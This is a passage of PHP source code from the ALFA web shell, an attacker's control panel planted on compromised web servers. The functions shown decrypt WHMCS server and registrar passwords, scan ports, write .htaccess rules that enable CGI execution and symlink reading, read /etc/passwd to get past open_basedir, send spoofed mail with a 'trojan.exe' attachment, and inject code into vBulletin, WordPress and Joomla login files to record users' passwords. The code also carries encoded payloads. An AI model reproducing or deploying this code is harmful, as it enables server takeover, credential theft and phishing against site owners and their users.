26Pkn99N6T7+MF1KpxEQoNeonoB1BYrSVVg0wIeZRXHoixR+GaI66d/GpFL909qeAkIY5w3PUM4dY7q5XCbAR60XSnrJXfffc2u2z0sxPPB59i2ZkZNejYpPioOFOA8cp0OXg1a+am5oDaV4FV3GMKIxibFF9ZUYtaCpL8DySTcg0q+WNwGKbTuJ3fPh+5pAXdBr15xe8Ft8OyAcQ2MrGZhpUQZs0KEQuEb4ZcPV1DdBfQGCHcbu9vtzvZY/zFqvqOmBJMXKhWmgoDWBnPo/c8frylhMfp1AUHfvfsg+Mu52zGI2zGo3/waHpwSrwXdX35xGfY7ey8ge/QYH0rATxTi2rCJKdmX4v3ZgJuT79+vxluhyyVdfqXgoTBr/32RU+oVACu0ijOJbQsCGWuVSJPD8D03gmx0BYkOH99AMOtoApEL7uwZk5nUj1DX8WZbnX7QOfQ/HBUmxza4y8xDSbgbu38mGf+P2AOSd0wOL2cJq7B1mg44s+wPJ4TfVROcnHVXMPiYwBmEjt0+H9APzcPJLbZ70bpINbznCXO9BvckhzEfOe5NPtSzqVma3dbmw7eVjFFMcdh9aaHa6oRrlYT5bX64fvfjwjnItcOb8d0QMYC7dxDebmvFfdf5d7Ytif303E+4Oh28ln+xiL5AxD6X4FNut2jtMm7kdi6c/LB94iqKz8jgv11NVZo=")),\'<string>\',\'exec\'))';
  5011. if($_POST['alfa1']=='perl'){$code = $perl;}else{$code = $py;}
  5012. if(__write_file($name,$code)){
  5013. @chmod($name,0755);
  5014. echo '<iframe src="'.__ALFA_DATA_FOLDER__.'/cgihaxor/'.$name.'" width="100%" height="600px" frameborder="0" style="opacity:0.9;filter: alpha(opacity=9);overflow:auto;"></iframe>';
  5015. }
  5016. }
  5017. echo $div;
  5018. alfafooter();
  5019. }
  5020. function alfaWhmcs(){
  5021. alfahead();
  5022. echo '<div class=header>';
  5023. function decrypt($string,$cc_encryption_hash){
  5024. $key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash);
  5025. $hash_key = _hash($key);
  5026. $hash_length = strlen ($hash_key);
  5027. $string = __ZGVjb2Rlcg($string);
  5028. $tmp_iv = substr ($string, 0, $hash_length);
  5029. $string = substr ($string, $hash_length, strlen ($string) - $hash_length);
  5030. $iv = $out = '';
  5031. $c = 0;
  5032. while ($c < $hash_length)
  5033. {
  5034. $iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));
  5035. ++$c;
  5036. }
  5037. $key = $iv;
  5038. $c = 0;
  5039. while ($c < strlen ($string))
  5040. {
  5041. if (($c != 0 AND $c % $hash_length == 0))
  5042. {
  5043. $key = _hash ($key . substr ($out, $c - $hash_length, $hash_length));
  5044. }
  5045. $out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c]));
  5046. ++$c;
  5047. }
  5048. return $out;
  5049. }
  5050. function _hash($string)
  5051. {
  5052. if(function_exists('sha1'))
  5053. {
  5054. $hash = sha1 ($string);
  5055. }
  5056. else
  5057. {
  5058. $hash = md5 ($string);
  5059. }
  5060. $out = '';
  5061. $c = 0;
  5062. while ($c < strlen ($hash))
  5063. {
  5064. $out .= chr (hexdec ($hash[$c] . $hash[$c + 1]));
  5065. $c += 2;
  5066. }
  5067. return $out;
  5068. }
  5069. AlfaNum(8,9,10);
  5070. echo "<center><br><div class='txtfont_header'>| WHMCS DeCoder |</div><p>".getConfigHtml('whmcs')."</p><form onsubmit=\"g('Whmcs',null,this.form_action.value,'decoder',this.db_username.value,this.db_password.value,this.db_name.value,this.cc_encryption_hash.value,this.db_host.value); return false;\">
  5071. <input type='hidden' name='form_action' value='2'>";
  5072. $table = array('td1' =>
  5073. array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
  5074. 'td2' =>
  5075. array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
  5076. 'td3' =>
  5077. array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'),
  5078. 'td4' =>
  5079. array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
  5080. 'td5' =>
  5081. array('color' => 'FFFFFF', 'tdName' => 'cc_encryption_hash : ', 'inputName' => 'cc_encryption_hash', 'id' => 'cc_encryption_hash', 'inputValue' => '', 'inputSize' => '50')
  5082. );
  5083. create_table($table);
  5084. echo "<p><input type='submit' value=' ' name='Submit'></p></form></center>";
  5085. if($_POST['alfa5']!=''){
  5086. $db_host=($_POST['alfa7']);
  5087. $db_username=($_POST['alfa3']);
  5088. $db_password=($_POST['alfa4']);
  5089. $db_name=($_POST['alfa5']);
  5090. $cc_encryption_hash=($_POST['alfa6']);
  5091. echo __pre();
  5092. $conn=@mysqli_connect($db_host,$db_username,$db_password,$db_name) or die(mysqli_error($conn));
  5093. $query = mysqli_query($conn,"SELECT * FROM tblservers");
  5094. $num = mysqli_num_rows($query);
  5095. if ($num > 0){
  5096. for($i=0; $i <=$num-1; $i++){
  5097. $v = @mysqli_fetch_array($query);
  5098. $ipaddress = $v['ipaddress'];
  5099. $username = $v['username'];
  5100. $type = $v['type'];
  5101. $active = $v['active'];
  5102. $hostname = $v['hostname'];
  5103. echo("<center><table border='1'>");
  5104. $password = decrypt ($v['password'], $cc_encryption_hash);
  5105. echo("<tr><td><b><font color=\"#FFFFFF\">Type</font></td><td>$type</td></tr></b>");
  5106. echo("<tr><td><b><font color=\"#FFFFFF\">Active</font></td><td>$active</td></tr></b>");
  5107. echo("<tr><td><b><font color=\"#FFFFFF\">Hostname</font></td><td>$hostname</td></tr></b>");
  5108. echo("<tr><td><b><font color=\"#FFFFFF\">Ip</font></td><td>$ipaddress</td></tr></b>");
  5109. echo("<tr><td><b><font color=\"#FFFFFF\">Username</font></td><td>$username</td></tr></b>");
  5110. echo("<tr><td><b><font color=\"#FFFFFF\">Password</font></td><td>$password</td></tr></b>");
  5111. echo "</table><br><br></center>";
  5112. }
  5113. $query1 = @mysqli_query($conn,"SELECT * FROM tblregistrars");
  5114. $num1 = @mysqli_num_rows($query1);
  5115. if ($num1 > 0){
  5116. for($i=0; $i <=$num1 -1; $i++){
  5117. $v = mysqli_fetch_array($query1);
  5118. $registrar = $v['registrar'];
  5119. $setting = $v['setting'];
  5120. $value = decrypt($v['value'], $cc_encryption_hash);
  5121. if ($value==""){
  5122. $value=0;
  5123. }
  5124. echo("<center>Domain Reseller <br><center>");
  5125. echo("<center><table border='1'>");
  5126. echo("<tr><td><b><font color=\"#67ABDF\">Register</font></td><td>$registrar</td></tr></b>");
  5127. echo("<tr><td><b><font color=\"#67ABDF\">Setting</font></td><td>$setting</td></tr></b>");
  5128. echo("<tr><td><b><font color=\"#67ABDF\">Value</font></td><td>$value</td></tr></b>");
  5129. echo "</table><br><br></center>";
  5130. }
  5131. }
  5132. }else{__alert('<font color="red">tblservers is Empty...!</font>');};
  5133. }
  5134. echo "</div>";
  5135. alfafooter();
  5136. }
  5137. function alfaportscanner(){
  5138. alfahead();
  5139. echo '<div class=header><center><p><div class="txtfont_header">| Port Scaner |</div></p>
  5140. <form action="" method="post" onsubmit="g(\'portscanner\',null,null,this.start.value,this.end.value,this.host.value); return false;">
  5141. <input type="hidden" name="y" value="phptools">
  5142. <div class="txtfont">Host: </div> <input id="text" type="text" name="host" value="localhost"/>
  5143. <div class="txtfont">Port start: </div> <input id="text" size="5" type="text" name="start" value="80"/>
  5144. <div class="txtfont">Port end: </div> <input id="text" size="5" type="text" name="end" value="80"/> <input type="submit" value=" " />
  5145. </form></center><br>';
  5146. $start = strip_tags($_POST['alfa2']);
  5147. $end = strip_tags($_POST['alfa3']);
  5148. $host = strip_tags($_POST['alfa4']);
  5149. if(isset($_POST['alfa4']) && is_numeric($_POST['alfa3']) && is_numeric($_POST['alfa2'])){
  5150. echo __pre();
  5151. $packetContent = "GET / HTTP/1.1\r\n\r\n";
  5152. if(ctype_xdigit($packetContent))$packetContent = @pack("H*" , $packetContent);
  5153. else{
  5154. $packetContent = str_replace(array("\r","\n"), "", $packetContent);
  5155. $packetContent = str_replace(array("\\r","\\n"), array("\r", "\n"), $packetContent);
  5156. }
  5157. for($i = $start; $i<=$end; $i++){
  5158. $sock = @fsockopen($host, $i, $errno, $errstr, 3);
  5159. if($sock){
  5160. stream_set_timeout($sock, 5);
  5161. fwrite($sock, $packetContent."\r\n\r\n\x00");
  5162. $counter = 0;
  5163. $maxtry = 1;
  5164. $bin = "";
  5165. do{
  5166. $line = fgets($sock, 1024);
  5167. if(trim($line)=="")$counter++;
  5168. $bin .= $line;
  5169. }while($counter<$maxtry);
  5170. fclose($sock);
  5171. echo "<center><p>Port <font style='color:#DE3E3E'>$i</font> is open</p>";
  5172. echo "<p><textarea style='height:140px;width:50%;'>".$bin."</textarea></p></center>";
  5173. }
  5174. flush();
  5175. }
  5176. }
  5177. echo '</div>';
  5178. alfafooter();
  5179. }
  5180. function alfacgihtaccess($m,$d='', $symname=false){
  5181. $readme = "";
  5182. if($symname){$readme="\nReadmeName ".trim($symname);}
  5183. if($m=='cgi'){
  5184. $code = "#ReCoded By HaxorWorld\nOptions FollowSymLinks MultiViews Indexes ExecCGI\nAddType application/x-httpd-cgi .haxor\nAddHandler cgi-script .haxor";
  5185. }elseif($m=='sym'){
  5186. $code = "#ReCoded By HaxorWorld\nOptions Indexes FollowSymLinks\nDirectoryIndex solevisible.phtm\nAddType text/plain php html php4 phtml\nAddHandler text/plain php html php4 phtml{$readme}\nOptions all";
  5187. }elseif($m=='shtml'){
  5188. $code = "Options +Includes\nAddType text/html .shtml\nAddHandler server-parsed .shtml";
  5189. }
  5190. @__write_file($d . ".htaccess", $code);
  5191. }
  5192. function alfabasedir(){
  5193. alfahead();
  5194. echo '<div class=header>
  5195. <center><p><div class="txtfont_header">| Open Base Dir |</div></p></center>';
  5196. $passwd = _alfa_file('/etc/passwd');
  5197. if(is_array($passwd)){
  5198. $users = array();
  5199. $makepwd = alfaMakePwd();
  5200. $basedir = @ini_get('open_basedir');
  5201. $safe_mode = @ini_get('safe_mode');
  5202. if(_alfa_can_runCommand(true,false)&&($basedir||$safe_mode)){
  5203. $bash = "fZBPSwMxEMXPzacYx9jugkvY9lbpTQ9eFU9NWdYk2wYkWZKsgmu+u9NaS8E/cwgDL/N+M+/yQjxbJ+KO3d4/rHjNusGpZL2DmEITTP/SKlOUIwOqNVTvgLxG2MB0CsGkITioz7X5P9riN60hzhHTvLYn5IoXfbAudYBXUUqHX9wPiEZDZQCj4OM807PIYovlwevHxPiHe0aWmVE7f7BaS4Ws8wEsWAe8UEOCSi+h6moQJinRtzG+6fIGtGeTp8c7Cqo4i4dAFB7xxiGakPdgSxtN6OxA/X7gePk3UtIPiddMe2dOe8wQN7NP";
  5204. $tmp_path = alfaWriteTocgiapi("basedir.haxor",$bash);
  5205. $bash_users = alfaEx("cd ".$tmp_path."/haxorcgiapi;sh basedir.haxor ".$makepwd,false,true,true);
  5206. $users = json_decode($bash_users, true);
  5207. $x=count($users);
  5208. if($x>=2){array_pop($users);--$x;}
  5209. }
  5210. if(!$basedir&&!$safe_mode){
  5211. $x=0;
  5212. foreach($passwd as $str){
  5213. $pos = strpos($str,':');
  5214. $username = substr($str,0,$pos);
  5215. $dirz = str_replace("{user}", $username, $makepwd);
  5216. if(($username != '')){
  5217. if (@is_readable($dirz)){
  5218. array_push($users,$username);
  5219. $x++;
  5220. }}}
  5221. }
  5222. echo '<br><br>';
  5223. echo "<b><font color=\"#00A220\">[+] Founded ".sizeof($passwd)." entrys in /etc/passwd\n"."<br /></font></b>";
  5224. echo "<b><font color=\"#FFFFFF\">[+] Founded ".$x." readable ".str_replace("{user}", "*", $makepwd)." directories\n"."<br /></font></b>";
  5225. echo "<b><font color=\"#FF0000\">[~] Searching for passwords in config files...\n\n"."<br /><br /><br /></font></b>";
  5226. foreach($users as $user){
  5227. if(empty($user))continue;
  5228. $path = str_replace("{user}", $user, $makepwd);
  5229. echo "<form method=post onsubmit='g(\"FilesMan\",this.c.value,\"\");return false;'><span><font color=#27979B>Change Dir <font color=#FFFF01>..:: </font><font color=red><b>$user</b></font><font color=#FFFF01> ::..</font></font></span><br><input class='foottable' type=text name=c value='$path'><input type=submit value='>>'></form><br>";
  5230. }
  5231. }else{echo('<b> <center><font color="#FFFFFF">[-] Error : coudn`t read /etc/passwd [-]</font></center></b>');}
  5232. echo '<br><br></b>';
  5233. echo '</div>';
  5234. alfafooter();
  5235. }
  5236. function alfamail(){
  5237. alfahead();
  5238. echo '<div class=header>';
  5239. AlfaNum(8,9,10);
  5240. echo '<center><p><div class="txtfont_header">| Fake Mail |</div></p><form action="" method="post" onsubmit="g(\'mail\',null,this.mail_to.value,this.mail_from.value,this.mail_subject.value,\'>>\',this.mail_content.value,this.count_mail.value,this.mail_attach.value); return false;">';
  5241. $table = array(
  5242. 'td1' => array('color' => 'FFFFFF', 'tdName' => 'Mail To : ', 'inputName' => 'mail_to', 'inputValue' => 'target@fbi.gov', 'inputSize' => '60','placeholder' => true),
  5243. 'td2' => array('color' => 'FFFFFF', 'tdName' => 'From : ', 'inputName' => 'mail_from', 'inputValue' => 'sec@google.com', 'inputSize' => '60', 'placeholder' => true),
  5244. 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Subject : ', 'inputName' => 'mail_subject', 'inputValue' => 'your site hacked by me', 'inputSize' => '60'),
  5245. 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Attach File : ', 'inputName' => 'mail_attach', 'inputValue' => $GLOBALS['cwd'].'trojan.exe', 'inputSize' => '60'),
  5246. 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Count Mail : ', 'inputName' => 'count_mail', 'inputValue' => '1', 'inputSize' => '60')
  5247. );
  5248. create_table($table);
  5249. echo '<p><div class="txtfont">Message:</div></p><textarea rows="6" cols="60" name="mail_content">Hi Dear Admin :)</textarea><p><input type="submit" value=" " name="mail_send" /></p></form></center>';
  5250. if(isset($_POST['alfa4'])&&($_POST['alfa4'] == '>>')){
  5251. $mail_to = $_POST['alfa1'];
  5252. $mail_from = $_POST['alfa2'];
  5253. $mail_subject = $_POST['alfa3'];
  5254. $mail_content = $_POST['alfa5'];
  5255. $count_mail = (int)$_POST['alfa6'];
  5256. $mail_attach = $_POST['alfa7'];
  5257. if(filter_var($mail_to, FILTER_VALIDATE_EMAIL)){
  5258. if(!empty($mail_attach)&&@is_file($mail_attach)){
  5259. $file = $mail_attach;
  5260. $content = __read_file($file);
  5261. $content = chunk_split(__ZW5jb2Rlcg($content));
  5262. $uid = md5(uniqid(time()));
  5263. $filename = basename($file);
  5264. $headers = "From: ".$mail_from." <".$mail_from.">\r\n";
  5265. $headers .= "To: " . $mail_to. " ( ".$mail_to." ) \r\n";
  5266. $headers .= "Reply-To: ".$mail_from."\r\n";
  5267. $headers .= "Content-Type: multipart/mixed; boundary=\"".$uid."\"\r\n\r\n";
  5268. $headers .= 'MIME-Version: 1.0' . "\r\n";
  5269. $headers .= 'X-Mailer: php' . "\r\n";
  5270. $mail_content = "--".$uid."\r\n";
  5271. $mail_content .= "Content-type:text/plain; charset=iso-8859-1\r\n";
  5272. $mail_content .= "Content-Transfer-Encoding: 7bit\r\n\r\n";
  5273. $mail_content .= $mail_content."\r\n\r\n";
  5274. $mail_content .= "--".$uid."\r\n";
  5275. $mail_content .= "Content-Type: application/octet-stream; name=\"".$filename."\"\r\n";
  5276. $mail_content .= "Content-Transfer-Encoding: base64\r\n";
  5277. $mail_content .= "Content-Disposition: attachment; filename=\"".$filename."\"\r\n\r\n";
  5278. $mail_content .= $content."\r\n\r\n";
  5279. $mail_content .= "--".$uid."--";
  5280. }else{
  5281. $headers = "From: " . $mail_from. " ( ".$mail_from." ) \r\n";
  5282. $headers .= "To: " . $mail_to. " ( ".$mail_to." ) \r\n";
  5283. $headers .= 'Reply-To: '.$mail_from.'' . "\r\n";
  5284. $headers .= 'Content-type: text/html; charset=utf-8' . "\r\n";
  5285. $headers .= 'MIME-Version: 1.0' . "\r\n";
  5286. $headers .= 'X-Mailer: php' . "\r\n";
  5287. }
  5288. if(empty($count_mail)||$count_mail<1)$count_mail=1;
  5289. if(!empty($mail_from)){echo __pre();
  5290. for($i=1;$i<=$count_mail;$i++){
  5291. if(@mail($mail_to,$mail_subject,$mail_content,$headers))echo("<center>Sent -> $mail_to<br></center>");
  5292. }}else{__alert("Invalid Mail From !");}
  5293. }else{__alert("Invalid Mail To !");}
  5294. }
  5295. echo('</div>');
  5296. alfafooter();
  5297. }
  5298. function alfaziper(){
  5299. alfahead();
  5300. AlfaNum(8,9,10);
  5301. echo '<div class=header><p><center><p><div class="txtfont_header">| Compressor |</div></p>
  5302. <form onSubmit="g(\'ziper\',null,null,null,this.dirzip.value,this.zipfile.value,\'>>\');return false;" method="post">
  5303. <div class="txtfont">Dir/File: </div> <input type="text" name="dirzip" value="'.(!empty($_POST['alfa3'])?htmlspecialchars($_POST['alfa3']):htmlspecialchars($GLOBALS['cwd'])).'" size="60"/>
  5304. <divclass="txtfont">Save Dir: </div> <input type="text" name="zipfile" value="'.$GLOBALS['cwd'].'alfa.zip" size="60"/>
  5305. <input type="submit" value=" " name="ziper" />
  5306. </form></center></p>';
  5307. if(isset($_POST['alfa5']) && ($_POST['alfa5'] == '>>')){
  5308. $dirzip = $_POST['alfa3'];
  5309. $zipfile = $_POST['alfa4'];
  5310. if($GLOBALS['sys']!='unix'&&_alfa_can_runCommand(true,true)){
  5311. alfaEx("powershell Compress-Archive -Path '".addslashes($dirzip)."' -DestinationPath '".addslashes(basename($zipfile))."'");
  5312. echo __pre().'<center><p>Done -> <b><font color="green">'.$zipfile.'</font></b></p></center>';
  5313. }elseif($GLOBALS['sys']=='unix'&&_alfa_can_runCommand(true,true)){
  5314. alfaEx("cd '".addslashes(dirname($zipfile))."';zip -r '".addslashes(basename($zipfile))."' '".addslashes($dirzip)."'");
  5315. echo __pre().'<center><p>Done -> <b><font color="green">'.$zipfile.'</font></b></p></center>';
  5316. }elseif(class_exists('ZipArchive')){
  5317. if(__alfaziper($dirzip, $zipfile)){
  5318. echo __pre().'<center><p><font color="green">Success...!<br>'.$zipfile.'</font></p></center>';
  5319. }else{echo __pre().'<center><p><font color="red">ERROR!!!...</font></p></center>';}
  5320. }
  5321. }
  5322. echo '</div>';
  5323. alfafooter();
  5324. }
  5325. function __alfaziper($source,$destination){
  5326. if(!extension_loaded('zip')||!file_exists($source)){
  5327. return false;
  5328. }
  5329. $zip=new ZipArchive();
  5330. if(!$zip->open($destination,ZIPARCHIVE::CREATE)){
  5331. return false;
  5332. }
  5333. $source=str_replace('\\','/',realpath($source));
  5334. if(is_dir($source)===true){
  5335. $files=new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source),RecursiveIteratorIterator::SELF_FIRST);
  5336. foreach($files as $file){
  5337. $file=str_replace('\\','/',$file);
  5338. if(in_array(substr($file,strrpos($file,'/')+1),array('.','..')))continue;
  5339. $file=realpath($file);
  5340. if(is_dir($file)===true){
  5341. $zip->addEmptyDir(str_replace($source.'/','',$file.'/'));
  5342. }else if(is_file($file)===true){
  5343. $zip->addFromString(str_replace($source.'/','',$file),file_get_contents($file));
  5344. }
  5345. }
  5346. }else if(is_file($source)===true){
  5347. $zip->addFromString(basename($source),file_get_contents($source));
  5348. }
  5349. return $zip->close();
  5350. }
  5351. function alfadeziper(){
  5352. alfahead();
  5353. AlfaNum(8,9,10);
  5354. echo '<div class=header><p><center><p><div class="txtfont_header">| DeCompressor |</div></p>
  5355. <form onSubmit="g(\'deziper\',null,null,null,this.dirzip.value,this.zipfile.value,\'>>\');return false;" method="post">
  5356. <div class="txtfont">File: </div> <input type="text" name="dirzip" value="'.(!empty($_POST['alfa3'])?htmlspecialchars($_POST['alfa3']):htmlspecialchars($GLOBALS['cwd'])).'" size="60"/>
  5357. <div class="txtfont">Extract To: </div> <input type="text" name="zipfile" value="'.$GLOBALS['cwd'].'" size="60"/>
  5358. <input type="submit" value=" " name="ziper" />
  5359. </form></center></p>';
  5360. if(isset($_POST['alfa5']) && ($_POST['alfa5'] == '>>')){
  5361. $dirzip = $_POST['alfa3'];
  5362. $zipfile = $_POST['alfa4'];
  5363. if(@!is_dir($zipfile)){
  5364. @mkdir($zipfile, 0777, true);
  5365. }
  5366. $finfo = "";
  5367. $file_type = "";
  5368. if(function_exists('finfo_open')){
  5369. $finfo = @finfo_open(FILEINFO_MIME_TYPE);
  5370. $file_type = @finfo_file($finfo, $dirzip);
  5371. @finfo_close($finfo);
  5372. }else{
  5373. if($GLOBALS['sys']=='unix'&&_alfa_can_runCommand(true,true)){
  5374. $file_type = alfaEx('file -b --mime-type ' . $dirzip);
  5375. }
  5376. }
  5377. if($GLOBALS['sys']!='unix'&&_alfa_can_runCommand(true,true)){
  5378. alfaEx("powershell expand-archive -path '".addslashes($dirzip)."' -destinationpath '".addslashes(basename($zipfile))."'");
  5379. echo __pre().'<center><p>Done -> <b><font color="green">'.$zipfile.'</font></b></p></center>';
  5380. }elseif($GLOBALS['sys']=='unix'&&!empty($file_type)&&_alfa_can_runCommand(true,true)&&(strlen(alfaEx('which unzip')) > 0||strlen(alfaEx('which tar')) > 0||strlen(alfaEx('which gunzip')) > 0)){
  5381. switch ($file_type) {
  5382. case 'application/zip':
  5383. alfaEx("cd '".addslashes($zipfile)."';unzip '".addslashes($dirzip)."'");
  5384. break;
  5385. case 'application/x-tar': case 'application/x-gzip': case 'application/x-gtar':
  5386. if(strstr(basename($dirzip), ".tar.gz")||strstr(basename($dirzip), ".tar")){
  5387. alfaEx("cd '".addslashes($zipfile)."';tar xzf '".addslashes($dirzip)."'");
  5388. }else{
  5389. alfaEx("cd '".addslashes($zipfile)."';gunzip '".addslashes($dirzip)."'");
  5390. }
  5391. break;
  5392. }
  5393. echo __pre().'<center><p>Done -> <b><font color="green">'.$zipfile.'</font> <a style="cursor:pointer;" onclick="g(\'FilesMan\',\''.$zipfile.'\');">[ View Folder ]</a></b></p></center>';
  5394. }elseif(class_exists('ZipArchive')){
  5395. $itsok = false;
  5396. if(emtpy($file_type)){
  5397. $file_type = "application/zip";
  5398. }
  5399. switch ($file_type) {
  5400. case 'application/zip':
  5401. $zip = new ZipArchive;
  5402. $res = $zip->open($dirzip);
  5403. if ($res) {
  5404. $zip->extractTo($zipfile);
  5405. $zip->close();
  5406. $itsok = true;
  5407. }
  5408. break;
  5409. case 'application/x-tar': case 'application/x-gzip': case 'application/x-gtar':
  5410. if(strstr(basename($dirzip), ".tar.gz")){
  5411. $new_file = $zipfile .'/'. basename($dirzip);
  5412. @copy($dirzip, $new_file);
  5413. $new_tar = str_replace(".tar.gz", ".tar", $new_file);
  5414. try {
  5415. $p = new PharData($new_file);
  5416. $p->decompress();
  5417. $phar = new PharData($new_tar);
  5418. $phar->extractTo($zipfile);
  5419. @unlink($new_file);
  5420. @unlink($new_tar);
  5421. $itsok = true;
  5422. } catch (Exception $e) {
  5423. }
  5424. }else{
  5425. try {
  5426. $phar = new PharData($dirzip);
  5427. $phar->extractTo($zipfile);
  5428. $itsok = true;
  5429. } catch (Exception $e) {
  5430. }
  5431. }
  5432. break;
  5433. }
  5434. if($itsok){
  5435. echo __pre().'<center><p><font color="green">Success...!<br>'.$zipfile.'</font> <a style="cursor:pointer;" onclick="g(\'FilesMan\',\''.$zipfile.'\');">[ View Folder ]</a></p></center>';
  5436. }else{echo __pre().'<center><p><font color="red">ERROR!!!...</font></p></center>';}
  5437. }
  5438. }
  5439. echo '</div>';
  5440. alfafooter();
  5441. }
  5442. function alfacmshijacker(){
  5443. alfahead();
  5444. AlfaNum(5,6,7,8,9,10);
  5445. echo '<div class=header><br>
  5446. <center><div class="txtfont_header">| Cms Hijacker |</div><br><br><form onSubmit="g(\'cmshijacker\',null,this.cmshi.value,this.saveto.value,\'>>\',this.cmspath.value);return false;" method=\'post\'>
  5447. <div class="txtfont">CMS: <select style="width:100px;" name="cmshi">';
  5448. $cm_array = array("vb"=>"vBulletin","wp"=>"wordpress","jom"=>"joomla","whmcs"=>"whmcs","mybb"=>"mybb","ipb"=>"ipboard","phpbb"=>"phpbb");
  5449. foreach($cm_array as $key=>$val)echo '<option value="'.$key.'">'.$val.'</option>';
  5450. echo("</select>");
  5451. echo ' Path installed cms: <input size="50" type="text" name="cmspath" placeholder="ex: /home/user/public_html/vbulletin/">
  5452. SaveTo: <input size="50" type="text" name="saveto" value="'.$GLOBALS['cwd'].'alfa.txt"></font>
  5453. <input type="submit" name="btn" value=" "></form></center><br>';
  5454. $cms = $_POST['alfa1'];
  5455. $saveto = $_POST['alfa2'];
  5456. $cmspath = $_POST['alfa4'];
  5457. if(!empty($cms) AND !empty($saveto) AND $_POST['alfa4'] AND $_POST['alfa3'] == '>>'){
  5458. echo __pre();
  5459. alfaHijackCms($cms,$cmspath,$saveto);
  5460. }
  5461. echo '</div>';
  5462. alfafooter();
  5463. }
  5464. function alfaHijackCms($cms,$cmspath,$saveto){
  5465. switch($cms){
  5466. case "vb":
  5467. hijackvBulletin($cmspath,$saveto);
  5468. break;
  5469. case "wp":
  5470. hijackwp($cmspath,$saveto);
  5471. break;
  5472. case "jom":
  5473. hijackJoomla($cmspath,$saveto);
  5474. break;
  5475. case "whmcs":
  5476. hijackWhmcs($cmspath,$saveto);
  5477. break;
  5478. case "mybb":
  5479. hijackMybb($cmspath,$saveto);
  5480. break;
  5481. case "ipb":
  5482. hijackIPB($cmspath,$saveto);
  5483. break;
  5484. case "phpbb":
  5485. hijackPHPBB($cmspath,$saveto);
  5486. break;
  5487. default:
  5488. echo "error!";
  5489. break;
  5490. }
  5491. }
  5492. function hijackvBulletin($path,$saveto){
  5493. $code='$alfa_username = strtolower($vbulletin->GPC["vb_login_username"]);$alfa_password = $vbulletin->GPC["vb_login_password"];$alfa_file = "{saveto_path}";$sql_query = $vbulletin->db->query_read("SELECT * FROM " . TABLE_PREFIX . "user WHERE `username`=\'" . $alfa_username . "\'");while($row = $vbulletin->db->fetch_array($sql_query)){if(strlen($alfa_password) > 1 AND strlen($alfa_username) > 1){$fp1 = @fopen($alfa_file, "a+");@fwrite($fp1, $alfa_username . \' : \' . $alfa_password." (" . $row["email"] . ")\n");@fclose($fp1); $f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);}}';
  5494. $clearpw = 'defined(\'DISABLE_PASSWORD_CLEARING\')';
  5495. $code=str_replace('{saveto_path}',$saveto,$code);
  5496. $login = $path."/login.php";
  5497. $class = $path."/includes/class_bootstrap.php";
  5498. $dologin = 'do_login_redirect();';
  5499. $evil_login = "\t".$code."\n\t".$dologin;
  5500. $evil_class = "true";
  5501. if((@is_file($login) AND @is_writable($login)) || (@is_file($class) AND @is_writable($class))){
  5502. $data_login = @file_get_contents($login);
  5503. $data_class = @file_get_contents($class);
  5504. if(strstr($data_login, $dologin) || strstr($data_class, $clearpw)){
  5505. $login_replace = str_replace($dologin,$evil_login, $data_login);
  5506. $class_replace = str_replace($clearpw,$evil_class, $data_class);
  5507. @file_put_contents($login, $login_replace);
  5508. @file_put_contents($class, $class_replace);
  5509. hijackOutput(0,$saveto);
  5510. }else{
  5511. hijackOutput(1);
  5512. }
  5513. }else{
  5514. hijackOutput(1);
  5515. }
  5516. }
  5517. function hijackwp($path,$saveto){
  5518. $code = '$alfa_file="{saveto_path}";$fp = fopen($alfa_file, "a+");fwrite($fp, $_POST[\'log\']." : ".$_POST[\'pwd\']." (".($user->user_email).")\n");fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);';
  5519. $redirect_wp = '#if[ ]{0,}\([ ]{0,}![ ]{0,}is_wp_error\([ ]{0,}\$user[ ]{0,}\)[ ]{0,}&&[ ]{0,}![ ]{0,}\$reauth[ ]{0,}\)[ ]{0,}{#';
  5520. $code=str_replace('{saveto_path}',$saveto,$code);
  5521. $login=$path."/wp-login.php";
  5522. if(@is_file($login) AND @is_writable($login)){
  5523. $data_login = @file_get_contents($login);
  5524. if(@preg_match($redirect_wp, $data_login, $match)){
  5525. $evil_login = "\t".$match[0]."\n\t".$code;
  5526. $login_replace = @preg_replace($redirect_wp,$evil_login, $data_login);
  5527. @file_put_contents($login, $login_replace);
  5528. hijackOutput(0,$saveto);
  5529. }else{
  5530. hijackOutput(1);
  5531. }
  5532. }else{
  5533. hijackOutput(1);
  5534. }
  5535. }
  5536. function hijackJoomla($path,$saveto){
  5537. $code = '<?php jimport(\'joomla.user.authentication\');$Alfa_auth = & JAuthentication::getInstance();$Alfa_data = array(\'username\'=>$_POST[\'username\'],\'password\'=>$_POST[\'passwd\']);$Alfa_options = array();$Alfa_response = $Alfa_auth->authenticate($Alfa_data, $Alfa_options);if($Alfa_response->status == 1){$alfa_file="{saveto_path}";$fp=@fopen($alfa_file,"a+");@fwrite($fp, $Alfa_response->username.":".$_POST[\'passwd\']." ( ".$Alfa_response->email." )\n");@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);}?>';
  5538. $code=str_replace('{saveto_path}',$saveto,$code);
  5539. $comp=$path."/administrator/components/com_login/";
  5540. if(@is_file($comp."/login.php")){
  5541. $login = $comp."/login.php";
  5542. }elseif(@is_file($comp."/admin.login.php")){
  5543. $login = $comp."/admin.login.php";
  5544. }else{
